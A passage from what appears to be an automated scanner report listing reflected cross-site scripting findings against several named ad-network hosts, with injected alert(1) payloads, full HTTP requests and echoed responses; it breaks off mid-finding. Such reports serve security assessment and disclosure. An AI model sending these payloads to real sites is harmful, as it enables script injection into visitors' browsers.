Date: Tue, 27 Sep 2011 13:21:13 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1317129673_1317129669033:1134794656352757; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 27 Sep 2011 13:21:13 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 761

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FVyeY6uHHCUA3iUFg5dAGQAAAAAAAAABAUrgehetRDEAAAAAAAAAQQO2gY7wFMt4mcEeI8W8QIlnDzYFOAAAAABshCAB
...[SNIP]...
3DH4sIAAAAAAAAABXLvQ0CMQwG0O_4U6Rbg9aSHRLZLliBHXJxUrMCk1FQX806iNe_FQuAa-tz5Fw7dRWhopXJg42KRItNS1euCYfHa_-sOP6HR-E5mUnFBoWNTJvYpFpcTbPe3CPhBOg94Yzl2xIuwPONHzTtG75zAAAA%2526dst%253D&tid=68326&type=mrect&eaf5d"-alert(1)-"7327d8aa32e=1' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

2.242. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 545cf"-alert(1)-"c2960292f75 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?clicktrack=http://ib.adnxs.com/click%3FVyeY6uHHCUA3iUFg5dAGQAAAAAAAAABAUrgehetRDEAAAAAAAAAQQO2gY7wFMt4mcEeI8W8QIlnDzYFOAAAAABshCABlAQAA2AMAAAIAAAClbggAPWQAAAEAAABVU0QAVVNEACwB-gDbTNsERRABAgUCAQQAAAAAMB3WDwAAAAA./cnd=!BwXkKQjykwgQpd0hGL3IASAA/referrer=http%253A%252F%252Fwww.nypost.com/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLvQ0CMQwG0O_4U6Rbg9aSHRLZLliBHXJxUrMCk1FQX806iNe_FQuAa-tz5Fw7dRWhopXJg42KRItNS1euCYfHa_-sOP6HR-E5mUnFBoWNTJvYpFpcTbPe3CPhBOg94Yzl2xIuwPONHzTtG75zAAAA%2526dst%253D&tid=68326&type=mrect545cf"-alert(1)-"c2960292f75 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:21:12 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1317129672_1317129669033:1134794656352757; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 27 Sep 2011 13:21:12 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 758

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FVyeY6uHHCUA3iUFg5dAGQAAAAAAAAABAUrgehetRDEAAAAAAAAAQQO2gY7wFMt4mcEeI8W8QIlnDzYFOAAAAABshCAB
...[SNIP]...
53DH4sIAAAAAAAAABXLvQ0CMQwG0O_4U6Rbg9aSHRLZLliBHXJxUrMCk1FQX806iNe_FQuAa-tz5Fw7dRWhopXJg42KRItNS1euCYfHa_-sOP6HR-E5mUnFBoWNTJvYpFpcTbPe3CPhBOg94Yzl2xIuwPONHzTtG75zAAAA%2526dst%253D&tid=68326&type=mrect545cf"-alert(1)-"c2960292f75' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

2.243. http://jlinks.industrybrains.com/jsct [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 8aa51<script>alert(1)</script>3cbc9204e14 was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=756&ct=COMPUTERWORLD_ROS8aa51<script>alert(1)</script>3cbc9204e14&tr=SECURITY&num=5&layt=3v1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.computerworld.com/s/article/9220295/MySQL.com_hacked_to_serve_malware?taxonomyId=17
Cookie: __utma=132846550.887164895.1313197515.1313197515.1313197515.1; __utmz=132846550.1313197515.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Mon, 26 Sep 2011 20:38:19 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 26 Sep 2011 20:38:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 88

// Error: Unknown old section COMPUTERWORLD_ROS8aa51<script>alert(1)</script>3cbc9204e14

2.244. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cc3f6<script>alert(1)</script>9f3bd471da3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=756&ct=COMPUTERWORLD_ROS&tr=SECURITY&num=5&layt=3v1&fmt=simp&cc3f6<script>alert(1)</script>9f3bd471da3=1 HTTP/1.1
Host: jlinks.industrybrains.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.computerworld.com/s/article/9220295/MySQL.com_hacked_to_serve_malware?taxonomyId=17
Cookie: __utma=132846550.887164895.1313197515.1313197515.1313197515.1; __utmz=132846550.1313197515.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Mon, 26 Sep 2011 20:38:20 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 26 Sep 2011 20:38:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 69

// Error: Unknown parameter cc3f6<script>alert(1)</script>9f3bd471da3

2.245. http://jlinks.industrybrains.com/jsct [tr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload b35b9<script>alert(1)</script>d4e7098c0e6 was submitted in the tr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=756&ct=COMPUTERWORLD_ROS&tr=SECURITYb35b9<script>alert(1)</script>d4e7098c0e6&num=5&layt=3v1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.computerworld.com/s/article/9220295/MySQL.com_hacked_to_serve_malware?taxonomyId=17
Cookie: __utma=132846550.887164895.1313197515.1313197515.1313197515.1; __utmz=132846550.1313197515.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Mon, 26 Sep 2011 20:38:19 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 26 Sep 2011 20:38:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 83

// Error: Site 756 has no section SECURITYb35b9<script>alert(1)</script>d4e7098c0e6

2.246. http://link.undertone.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.undertone.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cadee"-alert(1)-"57cda39887f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=300x250&entity=334534&site_code=44&section_code=20933&cadee"-alert(1)-"57cda39887f=1 HTTP/1.1
Host: link.undertone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/rtb_tier1?t=1317129821523&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nypost.com%2F&refer=http%3A%2F%2Fwww.nypost.com%2Fp%2Fnews%2Flocal%2Fli_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A28X=0

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:23:37 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 27 Sep 2011 13:23:37 GMT
Pragma: no-cache
Content-Length: 4335
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://link.undertone.com/imp?Z=300x250&cadee"-alert(1)-"57cda39887f=1&e=334534&S=20933&I=44&_salt=430652177";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new
...[SNIP]...

2.247. http://pglb.buzzfed.com/36696/3257d75f8c2757d32e8a0463830be2e6 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /36696/3257d75f8c2757d32e8a0463830be2e6

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e6f39<script>alert(1)</script>37b4155d507 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /36696/3257d75f8c2757d32e8a0463830be2e6?callback=BF_PARTNER.gate_responsee6f39<script>alert(1)</script>37b4155d507&cb=1020 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Tue, 04 Oct 2011 13:23:46 GMT
Date: Tue, 27 Sep 2011 13:23:46 GMT
Connection: close

BF_PARTNER.gate_responsee6f39<script>alert(1)</script>37b4155d507(1317100000);

2.248. http://pglb.buzzfed.com/36696/fedb6e8b45a69fe2d76a00bd07b06405 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /36696/fedb6e8b45a69fe2d76a00bd07b06405

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 2dcab<script>alert(1)</script>21f32e8f486 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /36696/fedb6e8b45a69fe2d76a00bd07b06405?callback=BF_PARTNER.gate_response2dcab<script>alert(1)</script>21f32e8f486&cb=3250 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Tue, 04 Oct 2011 13:23:07 GMT
Date: Tue, 27 Sep 2011 13:23:07 GMT
Connection: close

BF_PARTNER.gate_response2dcab<script>alert(1)</script>21f32e8f486(1317099981);

2.249. http://rbc.bridgetrack.com/a/s/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rbc.bridgetrack.com
Path:   /a/s/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17a20'-alert(1)-'e1ac2950ec7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/s/?BT_CON=51&BT_PID=676111&r=939827.4244740605&17a20'-alert(1)-'e1ac2950ec7=1 HTTP/1.1
Host: rbc.bridgetrack.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.rbcroyalbank.com/personal.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA=GUID=B2552C6CD0734C04812CC2E94AB2D40C; BTASES=SID=1EB144A14C9B484099AA2801367C2293; BTA3=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 327
Content-Type: application/x-javascript
Expires: Mon, 26 Sep 2011 13:27:54 GMT
Server: Microsoft-IIS/7.0
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://rbc.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: AdData=S5C=1&S6=26760z676111&S6T=201109270927530359&S3C=4&S4=28901z358118&S4T=201109270927450181&S3T=201109270927480773&S2C=1&S3=17857z358118&S7C=1&S1=26761z676111be1942b28ef853834ea1a7b1&S1T=201109270927280759&S2T=201109270927410733&S2=22444z358118&S1C=1&S5T=201109270927460337&S5=16973z358118&S4C=1&S7T=201109270927540524&S7=26761z676111&S6C=3; expires=Wed, 28-Sep-2011 04:00:00 GMT; path=/
Set-Cookie: BTA=GUID=B2552C6CD0734C04812CC2E94AB2D40C; expires=Fri, 21-Sep-2012 04:00:00 GMT; path=/
Set-Cookie: VCC3=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: BTASES=SID=1EB144A14C9B484099AA2801367C2293be1942b26f0a0503d98cb62f; path=/
Set-Cookie: ASB3=TX=1317130075&W=15191&Tr=15191&Cp=1023&P=676111&B=3&T=26191&Cr=26761&S=&Cn=51&Pd=0&SID=BC4B7A9AFFCC4E4EB00D0FDC49BDBA50&Vn=837&Ct=0&Pc=0&Pb=268&A=8; expires=Wed, 12-Oct-2011 04:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2011 13:27:54 GMT

function BTWrite(s) { document.write(s); }
document.write('<A HREF=\'http://rbc.bridgetrack.com/ads_v2/img_click/?BT_BCID=50178&BT_SID=11885&17a20'-alert(1)-'e1ac2950ec7=1\' target="_top"><IMG BORDER=
...[SNIP]...

2.250. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37c2d"%3balert(1)//315ac4aa587 was submitted in the action parameter. This input was echoed as 37c2d";alert(1)//315ac4aa587 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD37c2d"%3balert(1)//315ac4aa587&cwrun=200&cwadformat=160X600&cwpid=537740&cwwidth=160&cwheight=600&cwpnet=1&cwtagid=104418 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/160x600/nydnros_btf?t=1317129699572&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fny_crime%2F2011%2F09%2F26%2F2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Findex.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132982_1_3DL0Q; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP209
Last-Modified: Mon, 26 Sep 02011 15:53:50 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 27 Sep 2011 13:21:30 GMT
Content-Length: 8858
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 27-Sep-2011 16:08:10 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="537740";var cwtagid="104418";var cwadformat="160X600";var ca="VIEWAD37c2d";alert(1)//315ac4aa587";var cr="200";var cw="160";var ch="600";var cads="0";var cp="537740";var ct="104418";var cf="160X600";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.
...[SNIP]...

2.251. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44363"%3balert(1)//7a67956ab11 was submitted in the cwadformat parameter. This input was echoed as 44363";alert(1)//7a67956ab11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=160X60044363"%3balert(1)//7a67956ab11&cwpid=537740&cwwidth=160&cwheight=600&cwpnet=1&cwtagid=104418 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/160x600/nydnros_btf?t=1317129699572&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fny_crime%2F2011%2F09%2F26%2F2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Findex.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132982_1_3DL0Q; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP205
Last-Modified: Mon, 26 Sep 02011 15:44:29 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Content-Length: 8886
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:21:30 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 27-Sep-2011 16:08:10 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="537740";var cwtagid="104418";var cwadformat="160X60044363";alert(1)//7a67956ab11";var ca="VIEWAD";var cr="200";var cw="160";var ch="600";var cads="0";var cp="537740";var ct="104418";var cf="160X60044363";alert(1)//7a67956ab11";var cn="1";var epid="";var esid="";

       String.prototyp
...[SNIP]...

2.252. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b17a5"%3balert(1)//9b6ca64e3aa was submitted in the cwheight parameter. This input was echoed as b17a5";alert(1)//9b6ca64e3aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=160X600&cwpid=537740&cwwidth=160&cwheight=600b17a5"%3balert(1)//9b6ca64e3aa&cwpnet=1&cwtagid=104418 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/160x600/nydnros_btf?t=1317129699572&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fny_crime%2F2011%2F09%2F26%2F2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Findex.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132982_1_3DL0Q; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP203
Last-Modified: Mon, 26 Sep 02011 15:39:43 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 27 Sep 2011 13:21:31 GMT
Content-Length: 8858
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 27-Sep-2011 16:08:11 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="537740";var cwtagid="104418";var cwadformat="160X600";var ca="VIEWAD";var cr="200";var cw="160";var ch="600b17a5";alert(1)//9b6ca64e3aa";var cads="0";var cp="537740";var ct="104418";var cf="160X600";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLowerCase())
...[SNIP]...

2.253. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9977"%3balert(1)//0077425797b was submitted in the cwpid parameter. This input was echoed as c9977";alert(1)//0077425797b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=160X600&cwpid=537740c9977"%3balert(1)//0077425797b&cwwidth=160&cwheight=600&cwpnet=1&cwtagid=104418 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
